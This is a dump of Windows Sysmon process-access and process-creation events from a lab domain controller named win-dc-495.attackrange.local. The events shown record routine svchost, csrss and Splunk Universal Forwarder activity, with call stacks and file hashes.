13:48:48.106{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007314Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:48.106{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007313Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:48.106{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007312Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:48.106{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007311Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:48.106{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007310Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:48.106{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007309Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:48.106{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007308Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:48.106{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007307Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:48.106{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007306Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:48.106{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91C0-6005-0D03-00000000A301}4588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007305Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:48.106{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-91C0-6005-0D03-00000000A301}4588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007304Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:48.107{59A5CD1D-91C0-6005-0D03-00000000A301}4588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007351Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:49.887{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-91C1-6005-1103-00000000A301}3692C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007350Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:49.887{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007349Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:49.887{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007348Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:49.887{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007347Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:49.887{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007346Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:49.887{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007345Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:49.887{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007344Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:49.887{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007343Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:49.887{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007342Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:49.887{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007341Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:49.887{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91C1-6005-1103-00000000A301}3692C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007340Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:49.887{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-91C1-6005-1103-00000000A301}3692C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007339Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:49.888{59A5CD1D-91C1-6005-1103-00000000A301}3692C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007338Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:49.278{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91C1-6005-1003-00000000A301}3232C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007337Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 